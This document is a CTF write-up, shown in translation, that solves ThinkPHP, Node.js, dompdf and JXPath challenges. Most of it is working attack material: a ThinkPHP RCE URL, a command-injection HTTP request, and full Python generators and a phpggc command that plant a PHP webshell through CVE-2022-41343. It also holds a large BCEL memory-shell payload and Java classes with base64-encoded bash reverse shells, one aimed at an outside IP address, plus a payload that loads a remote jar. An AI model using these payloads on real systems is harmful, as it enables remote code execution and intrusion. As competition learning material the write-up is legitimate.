While the big names were all off playing Alibaba Cloud CTF, I quietly took first place

pdf_converter

Unintended solution: the ThinkPHP V5.0.21 RCE PoC works directly.

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

Have you heard of a JS webshell?

The challenge hinted at an information leak.

First, open the browser dev tools (F12) and have a look.

There are a few API endpoints:

/v3/UpdateAllProduct
/v2/coding/projectList
/v2/coding/distList
/v2/coding/versionList
/v2/coding/distExist

The /v3/UpdateAllProduct endpoint looks suspicious.

Modifying the request and resending it got nowhere.

The hint said to scan, so let's scan for directories:

[11:39:19] 200 -  679B  - /app.js
[11:39:28] 200 -  439B  - /config.js
[11:39:34] 200 -  147B  - /Dockerfile
[11:39:59] 200 -  627B  - /package.json
[11:39:59] 200 -   64KB - /package-lock.json
[11:40:08] 200 -   34B  - /README.md

Visit those files and crawl the whole source tree from what they reveal (the paths passed to require() in each JS file, combined with the current file's location, lead to every source file).

Auditing the code reveals an obvious command injection in /app/api/v3/UpdateAllProduct.js.

Commands can be executed, but the target box seems to have no outbound network access. The official writeup uses a boolean-blind approach (no output echoed back) or writes a JS webshell to get a shell; my approach is purely about grabbing the flag.

Since files under /app/ are served directly, I simply used the command injection to write the flag into the /app/ directory:

POST /v3/UpdateAllProduct HTTP/1.1
Host: 114.117.174.147:18882
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Referer: http://114.117.174.147:18886/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
x-coding-event: pingaaa
Content-Length: 140

{"artifact":{"artifactRepoName":1,
"artifactPkgName":";cat /flag/flag.txt>/app/pankas666123.js",
"artifactVersionName":1,"projectName":1}}

pdf_converter_revenge

The RCE from the pdf_converter challenge above was patched, but testing showed a deserialization vulnerability still exists: the ThinkPHP 5.0.24 deserialization chain can be used to get RCE.

This one would be fairly hard to analyse from scratch on your own, but there are plenty of articles online to refer to.

Reference: https://tantosec.com/blog/cve-2022-41343/

Following the steps in that article is enough to get through; it analyses the vulnerability's root cause in depth, so I won't repeat that here.

generate_font.py

#!/usr/bin/env python3
import os
import sys
import tempfile

import fontforge  # python3-fontforge; builds the dummy font below

def main():
    # Write the raw TTF bytes to stdout so they can be redirected into a file
    sys.stdout.buffer.write(do_generate_font())

def do_generate_font() -> bytes:
    # Build a minimal dummy font with FontForge and return its TTF bytes
    fd, fn = tempfile.mkstemp(suffix=".ttf")
    os.close(fd)
    font = fontforge.font()
    font.copyright = "DUMMY FONT"
    font.generate(fn)
    with open(fn, "rb") as f:
        res = f.read()
    os.unlink(fn)
    return res

if __name__ == "__main__":
    main()

python3 generate_font.py > font.ttf generates the font.ttf file.

Then use phpggc to build font-polyglot.phar, using the ThinkPHP/RCE2 deserialization payload directly (note that the path of the shell file being written must be under public):

php -d phar.readonly=0 phpggc ThinkPHP/RCE2 system "echo '<?php system(\$_GET[0]); ?>' > /var/www/html/public/shell.php" -p phar -pp font.ttf -o font-polyglot.phar

Then run the following script.

generate_payload.py

#!/usr/bin/env python3
import argparse
import base64
import hashlib
import os
import urllib.parse

# Two forms of the same @font-face stylesheet: one with spaces already replaced
# by '+' (ready to be sent URL-encoded) and one in plain form for reference.
PAYLOAD_TEMPLATE_URL_ENCODED = '''
<style>@font-face+{+font-family:'exploit';+src:url('%s');+font-weight:'normal';+font-style:'normal';}</style>
'''
PAYLOAD_TEMPLATE = '''
<style>
    @font-face {
        font-family:'exploit';
        src:url('%s');
        font-weight:'normal';
        font-style:'normal';
    }
</style>
'''

def get_args():
    parser = argparse.ArgumentParser(
        prog="generate_payload.py",
        formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
        epilog="This script will generate payloads for CVE-2022-41343",
    )
    parser.add_argument("file", help="Polyglot File")
    parser.add_argument("-p", "--path", default="/var/www/",
                        help="Base path to vendor directory (Default = /var/www/)")
    return parser.parse_args()

def main():
    args = get_args()
    file = args.file.strip()
    path = args.path.strip()
    if os.path.exists(file):
        generate_payloads(file, path)
    else:
        print("ERROR: File doesn't exist.")

def generate_payloads(file, path):
    with open(file, "rb") as f:
        fc = f.read()
    b64 = base64.b64encode(fc).decode()
    # The cached font file name is derived from the MD5 of the plain data URI
    data_uri_pure = "data:text/plain;base64,%s" % b64
    md5 = hashlib.md5(data_uri_pure.encode()).hexdigest()
    # Request 1: the base64 body is double URL-encoded so it survives decoding
    data_uri_double_encoded = "data:text/plain;base64,%s" % urllib.parse.quote_plus(
        urllib.parse.quote_plus(b64))
    # Request 2: reference the cached polyglot font through the phar:// wrapper
    phar_uri = "phar://%s/vendor/dompdf/dompdf/lib/fonts/exploit_normal_%s.ttf##" % (path, md5)
    req1_enc = PAYLOAD_TEMPLATE_URL_ENCODED % data_uri_double_encoded
    req2_enc = PAYLOAD_TEMPLATE_URL_ENCODED % urllib.parse.quote_plus(phar_uri)
    req1_pure = PAYLOAD_TEMPLATE % data_uri_double_encoded
    req2_pure = PAYLOAD_TEMPLATE % phar_uri
    print("====== REQUEST 1 ENCODED =======")
    print(req1_enc)
    print("====== REQUEST 2 ENCODED =======")
    print(req2_enc)
    print("====== REQUEST 1 NOT ENCODED =======")
    print(req1_pure)
    print("====== REQUEST 2 NOT ENCODED =======")
    print(req2_pure)

if __name__ == "__main__":
    main()

python3 generate_payload.py -p "/var/www/html" font-polyglot.phar generates the payloads:

python generate_payload.py -p "/var/www/html" font-polyglot.phar

====== REQUEST 2 ENCODED =======

<style>@font-face+{+font-family:'exploit';+src:url('phar%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fvendor%2Fdompdf%2Fdompdf%2Flib%2Ffonts%2Fexploit_normal_db71f18fd6e780a597c6ddf93c13f7dc.ttf%23%23');+font-weight:'normal';+font-style:'normal';}</style>


====== REQUEST 2 NOT ENCODED =======

<style>
    @font-face {
        font-family:'exploit';
        src:url('phar:///var/www/html/vendor/dompdf/dompdf/lib/fonts/exploit_normal_db71f18fd6e780a597c6ddf93c13f7dc.ttf##');
        font-weight:'normal';
        font-style:'normal';
    }
</style>

Note one problem here: the file written into /var/www/html/vendor/dompdf/dompdf/lib/fonts is named in the form exploit_normal_md5(data:text/plain;base64,exp).ttf, but the name the Python script computes is not the same as the one PHP generates. It's best to stand up a local environment and check; this is exactly what stopped me from solving it during the competition.

ezjxpath

Another Java challenge, which I'm not great at, but the Java hurdle still has to be cleared.

public String hack(@RequestParam(name = "query",required = true) String query) throws Exception {
    try {
        Waf waf = new Waf();
        if (!waf.check(query)) {
            return "try harder";
        } else {
            JXPathContext context = JXPathContext.newContext((Object)null);
            context.getValue(query);
            return "good job!";
        }
    } catch (Exception var4) {
        return "some thing wrong?";
    }
}

It uses JXPathContext, which has a known vulnerability: CVE-2022-41852.

Reference: https://xz.aliyun.com/t/11769

It allows creating objects and calling both static and instance methods; see the link above for the details of how to use it.

The WAF outright bans these strings:

"java.lang", "Runtime", "org.springframework", "javax.naming", "Process", "ScriptEngineManager"

And the runtime requires fully qualified class names, so a reflection-based bypass is out as well.

Method 1

The official writeup uses BCEL to plant an in-memory shell.

For background on BCEL see https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html

The JDK ships com.sun.org.apache.bcel.internal.util.JavaWrapper,

whose new (constructor) call can perform a BCEL class load.

Write the memory shell directly:

POST

Header: cmd:cat /flag

query=runMain(com.sun.org.apache.bcel.internal.util.JavaWrapper.new(),"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$c9w$d3F$Y$ffMb$5b$b2$y$g$e2$E$82$d8w$9c$40$ecR$ba$40$C$94$90$Q$a08$81b$m$85P$40Q$86D$c4$96$8c$q$t$a1$fbBw$ba$aft$a1$x$a5$eb$a1$X$c3$83G$l$e7$k$fb$5e$P$fd$T$faz$e8$b5$87$3e$dao$q$9b$d8$c4$b4$f5a4$f3$ad$bf$f9$b6$f1O$d7$_$ff$I$e0N$7c$af$m$8a$fd$K$O$60$40$y$P$c88$a8$e0$Q$Ge$i$96$f0$a0$C$JG$q$iUp$M$ba$8c$n$Z$86$8ca$Z$5cF$b7$e0$j$971$o$a3G$c2$a8$900e$f4$ca8$a1$60$MY$FM$c8$c9$b0$c4$d7$96$91$97qRl$j$Z$ae$MOFA$c6$b8p$3d$ncR$c2$v$F$P$e1a$b1$3c$a2$e0Q$3c$a6$609$k$97$f1$84$f8$3e$v$96$a7d$3c$z$e3$b4$84g$Y$o$hM$cb$f463$d4$tZ$P0$84$ba$eda$ce$d0$906$z$de_$c8$Nqg$9f$3e$94$rJ$3cm$hz$f6$80$ee$98$e2$5c$o$86$bcQ$d3ehL$Pq$p$9b$ca$e4$j$d3$g$d96nf$3b$Z$c2Gs$bai1$ccN$M$a6O$e8$e3z$w$ab$5b$p$a9$8c$tD$3a$7dO$ba32$ce$d0T$83$cd$c0$Mau$8a$d1$9d$d5$5dW$d0s$Ms$x$e8$O$3f$9e$e5$86$97$ea$e3$de$a8$3d$y$El$BuJ$60$f7$d0$J$e2$T$a3$$$b7$96$7c$3a$dc$cd$d3U$j$7e$92$n$3a$c2$bd$B$c7$f4$b8$T$ecwp$7dX$ec$p$T$rb$bd$91$h$ae$b6v$D$9fl$d8$b9$9cn$N$d3$e5c$c6$a8$ee$b8$dc$eb$d7s$U$91$Z$ZO7$c6$fa$f4$bc$l$n$J$h$u$ef$S$9e$a5$acSZ$Z$94m$93$G$cf$7b$a6m$b9$S$9ec$98$Z$A$df$a3$3b$a4MN$c9$9e$92$b1$L$8e$c1$7bM$R$e0$86$a9$98$s$F$M$V$v$dc$$$e1y$V$_$e0E$V$_$e1$M$c3F$db$ZI$ba$be$dcqaf$c2v$c6$92$T$7c$ui$d8$96$c7$t$bd$q$dd$b6$c0$5d$_$b97$f8v$H$e4$jv$96$ae$x$e1e$V$af$e0U$86f$KAI$a2$cb$a3$7b$O$V$3cNp$gnJ$82$8a$d7$f0$3a$B$bf9$c4tI$Vo$e0M$86$z$ff$XO$86$3b$e3$d9$9aNc$3e$W7Oa$a2$m$uS$c8$Y$W$I$c7$93I7$d0$9d$b2$R$I$abxK$a0$5bQ$z4$eay$f9$e4$OZ$aa$3dV$dd$oH$ad$8a$b7$f1$O$83d$bbI$8b$a0KxW$c5$7b8$ab$e2$7d$7c$m$w$c3$b4$86$ed$J$V$l$e2$p$w$8f$ed$5bwQ$9d$ef$df$d7$db$be$5e$c59$nP$3f$b0$b3$9fJ$zE$d5$x$a5$86L$x$e5R$ce$eb$da$N$V$l$e3$T$a2$89$a0xY$ea$8aF$dfq$c13$a9k$M$dd$b2D$o$3eU$f1$Z$3eW$f1$F$ceK$f8R$c5$F$7c$r$d2$fd5Y8$dc$a5$e2$h$7c$ab$e2$3b$e1$r$7c$3c$5b$Q$86$c3F$d6$W$f1i$b8$a9$fb$Y$e6$dc$aaC$a8$df$a6X7j$b1$w$Q$fbF$jj$E$aad$a3$e08$dc$f2$ca$e7$e6Dk$faf$v$ea$84Y$94$9cRE$f9$f5$91$b6$83$$$d2$aa$c4$xXB$a7$s$83$ba0K$h$9fB$vL$d4$Y$h5$s$82$e8$dc$f2$dd$b6$d4
$d0$Z$9c$a6$d3$fao$f3$pbZ$e3$f6$Y$FuCb$fa$U$Z$9cNj$ad5k$g$JS$P$e5Dw$f8p$Z$db$M$g$R$5d$86$c1$5d$d7$MFg$e2$90$98$82$95$Vx$ca$f5x$$$u$fe$3d$8e$9d$e7$8ew$8aa$e5$7f$c4$e1$c6H$8ayv$da$9e$e0N$b7$$j$a2$3a$5b$95s$cb$f2h$$S$80$e7U$g$ee$a6$Z$96$R$5da$Z$bc$b3$f5$90om$7f$3e_$b6$s$8b$q$Hyi$9a$9e$d7$cer$3d$fb$a4$bd$F$cb3s$e5$b6$z$lfU$a9$95$c8$a4$Y$e2$93$9c$ba$rQ$f3$95$a8$mQ$40D$ec$aa$5d$95$88$M$b7$91$ab$9dV$be$e0$91$s$d7$v$86$zew$a6$9d$aa$60$90z$5b$a2$s$a3$f6$h$a5$W$5c$de$c3$b3f$$x$QV$dd$3a$X$95$ad$y$aeeQ$3f$60$J$92$f4$u$8b_$j$98$98$dc$b4$ae$a5S$8a$be$8c$be$e1$b6$8b$60$3f$f8$ec$3bh$8d$f8D$V$eb$fc$d5$X$a0$ff$Uw$d17$8a$bbq$P$ea$85r$dd$V$3a$cd$A$d8$c4$r$d4$VQ$l$P$V$RN$af$8eG$ea$afB$wB$ee$5b$c3h$X$zB$e9$_$J$c4$C$B$b5$y$b0$3a$3e$a3$b4$ed$I$adi$_$Jw$84$b5$d0$8d$7d$a4$a4y$hi$c6$h$C$e1$99$jR$89$da$u$a8$f1$QQ$P$d6$c7$9b2$82$rk2$c1h$d6$a4$60$d5$c2eKQM$d6$o$q$g$r$d1Y$q$aa$5cCS$87$S$b9Jk$y$3e$fb$SZ$8a$98$T$d7$8a$98$7b$Wr$7c$de$F2$3c$bfC$z1$W$c4$X$fa$8c$b8$W$T$caZ$y$U_$94$b9$80$Gq$5c$ec$l$97$d0$g$d6$94$8cF$be$96$c6$97UB$d2$a2$81$d7$xX$7e$f0$SVh$U$84$95E$ac$d2$d4$8bH$c4$5b$8bh$xb$b5$c03$Q$e8$ae$v$5dR$8b$96$90$97$e8$ed$d3$e8$o$5d$f5$7e$baN$60$$$adqJU$TZ$d0L$d9$9e$85v$cc$c6z$3a$f5$60$OvC$c3$m$c9$9c$c4$3c$9c$c1$7cz$i$X$d0$5b$b2$Q$e7$b1$I$97I$fa$g$96$e2W$y$c3o$f4$8f$ec$P$ac$c0$9fX$85$ebH$b0$Q$da$98$82$d5$ac$Xk$d8$R$b4$b3q$aa$oQ$S$a7$83$b4$93$fd$N$a2$40$d8$Y$3a$d0Ie$d2$c2$8ea$p6Q$R$za$H$b0$Z$f7$S$be$k$b6$O$5b$88$W$c2n$96$40$X$d1$c2$Yd$f3$b1$95v$R$9cd$Rt$TW$o$5c$bf$T$d6M$90$J$d5$cf$d8F$dc$ua$bb$8a$5el$87B$I$_b$Hy$8b$R$ces$d8I4$V$f7$91$ef$f5$I$fd$8d_$a0J$d8$r$n$z$a1OB$7fy$N6$c1$7e7$J$A$5d$b4$f9$L$8bi$8da$Pi$87$I$f3$fd$d8$x$ca$9b$91$v$ba$T2$7e$P$ec$fb$H$5e$c7$8a$9fH$L$A$A",'')


Method 2

You can also use com.sun.org.apache.bcel.internal.util.ClassLoader directly: with BCEL, load the class through loadClass and instantiate it, which executes arbitrary code.

Exploit:

Evil.java

package com.example.first;
import java.io.IOException;

public class Evil {
    public Evil() throws IOException {
        Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}");
    }
}

Main.java

package com.example.first;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;

public class Main {
    // Repository.lookupClass and Utility.encode both declare checked exceptions
    public static void main(String[] args) throws Exception {
        // Look up the compiled Evil class and BCEL-encode its bytecode
        JavaClass cls = Repository.lookupClass(Evil.class);
        String code = "$$BCEL$$" + Utility.encode(cls.getBytes(), true);
        // JXPath expression: create a BCEL ClassLoader, load the encoded class, instantiate it
        String payload = "newInstance(loadClass(com.sun.org.apache.bcel.internal.util.ClassLoader.new(),\"" + code + "\"))";
        System.out.println(payload);
    }
}

payload

newInstance(loadClass(com.sun.org.apache.bcel.internal.util.ClassLoader.new(),"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmQ$5dO$TA$U$3d$d3$$$y$acE$a1$I$e2$t$f8D$c1$d6$7d$d9$98$98$82$91$401$9a$ddB$a9A$e0m$3a$j$db$a9$fbAvg$ebR$e4G$f9$a2$c6$H$7f$80$3f$cax$b7$Y$q$d1$99$cc$9c9$e7$de3$b93$f7$e7$af$ef$3f$A8X$b60$89$b2$85y$dc$9e$c2B$8e$8b$s$ee$98Xb$98$dcP$a1$d2$_$Y$8a$95$b5C$Gc$3b$eaJ$86$5b$ae$Ke3$N$3a2$7e$cb$3b$3e$ve7$S$dc$3f$e4$b1$ca$f9$l$d1$d0$7d$950$y$b9$o$Kl$99$f1$e0$d4$97$f6$7b$V$t$dan$M$95_g$b0$g$99$90$a7ZEab$e2$$$f1v$94$c6B$ee$aa$dc$3e$9d$t$3d$j$f0$n$_$c1$c4$94$89$7b$r$dc$c7$D$G$de$e1I$7f$a5$sV$ce$a5$e8G$d5$e3$60w$c4$b7$b74oo$3dy$a3$9e$7f89$3a$kv_5$3f$ba$a3F$e6$v$t$f3$G$ad$b4$b9$d3J$bd$81$e7$90v$e6$8dZ$3do$c7$J$bc$d6$e6$e6$c5$a7s$baL$3es$aa$b5$ee$e5$b9_$ad$a9$8b$S$k$e2$R$c3$e2$ff$Lg$98$cd$ab$b2$7d$k$f6$ec$bd$ce$40$K$cd0$3f$96Td$bf$de$bbz$U$c3$dc$df$c4$834$d4$w$a0wY$3d$a9$af$c8Be$cd$fd$t$87$7e$c6$90$99$U$M$ab$95k$d1$b6$8eU$d8$ab_7$ec$c7$91$90IR$c7cLP$T$f3$c1h$d2w$a1$80ib$_$J$Z$e1$cd$f5$af$60$dfP$u$X$bf$c0x$f7$99$94$C$ac$5cG$91$f6$J$Y$e4$9e$n$df$Nb$a5K$H$e1$cc$YAQj$3a$ad$d9$b1o$ee7$3a$z$U$i$3a$C$A$A"))

Method 3

Another approach is to use java.net.URLClassLoader.

Prepare Evil.java:

import java.io.IOException;

public class Evil {
    public Evil() throws IOException {
        Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzExMi4xMjQuNDQuMjM4LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}");
    }
}

Note that there is no package declaration above; with one, the class would not be found.

Build the evil.jar package:

javac Evil.java
jar cvf evil.jar Evil.class

payload:

newInstance(loadClass(java.net.URLClassLoader.newInstance(java.util.Collections.singletonList(java.net.URL.new("http://127.0.0.1:8080/evil.jar"))),"Evil"))

While working out this call chain I got stuck on how to pass a URL[] argument through it.

We all know URLClassLoader can load a class remotely, like this:

package com.example.first;

import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;

public class Main {
    public static void main(String[] args) throws ClassNotFoundException, MalformedURLException, InstantiationException, IllegalAccessException {
        URL[] urls = new URL[] {new URL("http://127.0.0.1:8080/evil.jar")};
        URLClassLoader.newInstance(urls).loadClass("Evil").newInstance();
    }
}

Rewritten in JXPath syntax:

newInstance(loadClass(java.net.URLClassLoader.newInstance(urls),"Evil"))

This exposes a problem: the argument URLClassLoader expects is a URL[], so how do we create such an object?

Trying to pass a single URL directly:

newInstance(loadClass(java.net.URLClassLoader.newInstance(java.net.URL.new("http://127.0.0.1:8080/evil.jar")),"Evil"))

Debugging shows that the invoke method in org/apache/commons/jxpath/functions/MethodFunction.java converts the supplied arguments according to the parameter types of the method being called.

But that type conversion fails, and what ends up being returned is an empty URL array.

The printed log also shows the conversion failing and an empty URL array being handed over.

Looking deeper at why an empty URL array comes back: internally, org/apache/commons/beanutils/converters/ArrayConverter.java calls its parseElements method to do the conversion, and the way it splits the string into elements appears to be buggy.

The intent is to split a string such as http://aaa,http://bbb,http://ccc on the comma, create a List and add the pieces to it. But there seems to be a small bug: everything after the colon is cut off, so the resulting List contains only the string http; the subsequent internal conversion to URL[] then fails and an empty URL array is returned.

From the analysis above we know that converting a string to URL[] goes through an intermediate step: the string is first converted to a List, and the List is then converted to URL[]. Since the bug sits in the string-to-List step, we can simply hand it a List whose elements are already URL objects.
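To show where the truncation observed above comes from, here is an added example (my own code, not the writeup's or the commons-beanutils source) that rebuilds the tokenizer setup I believe ArrayConverter.parseElements uses: the ',' delimiter is made whitespace, digits, '.' and '-' become word characters, and everything else keeps java.io.StreamTokenizer defaults, where a single '/' starts a comment that runs to end of line. Under that assumption, http://aaa,http://bbb,http://ccc tokenizes to just http, which matches the log the author saw.

```java
import java.io.IOException;
import java.io.StreamTokenizer;
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;

public class ParseElementsDemo {

    // Assumed re-creation of the ArrayConverter.parseElements tokenizer setup
    // (written from memory, not copied from commons-beanutils): ',' is the element
    // delimiter, digits, '.' and '-' count as word characters, all else is default.
    static List<String> parseElements(String value) throws IOException {
        StreamTokenizer st = new StreamTokenizer(new StringReader(value));
        st.whitespaceChars(',', ',');   // the delimiter is treated as whitespace
        st.ordinaryChars('0', '9');     // switch off numeric parsing of digits
        st.wordChars('0', '9');         // ...and make digits part of word tokens
        for (char c : new char[] {'.', '-'}) {
            st.ordinaryChars(c, c);
            st.wordChars(c, c);
        }
        List<String> list = new ArrayList<>();
        int ttype;
        while ((ttype = st.nextToken()) != StreamTokenizer.TT_EOF) {
            // Ordinary characters such as ':' come back with sval == null and are dropped;
            // '/' is a comment character by default, so "//aaa,http://bbb..." is skipped
            // to the end of the line. Only word (and quoted) tokens are collected.
            if ((ttype == StreamTokenizer.TT_WORD || ttype > 0) && st.sval != null) {
                list.add(st.sval);
            }
        }
        return list;
    }

    public static void main(String[] args) throws IOException {
        // A plain comma-separated list splits into three elements as intended
        System.out.println(parseElements("aaa,bbb,ccc"));
        // A list of URLs loses everything from the first ':' and '//' onwards
        System.out.println(parseElements("http://aaa,http://bbb,http://ccc"));
    }
}
```

Running it prints [aaa, bbb, ccc] for the first call and [http] for the second, which is why the later URL[] conversion has nothing valid to work with.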

In Java, a single object can be wrapped in a List with this static method:

java.util.Collections.singletonList(Object o)

which returns a List.

Using that, the payload can be constructed successfully:

newInstance(loadClass(java.net.URLClassLoader.newInstance(java.util.Collections.singletonList(java.net.URL.new("http://127.0.0.1:8080/evil.jar"))),"Evil"))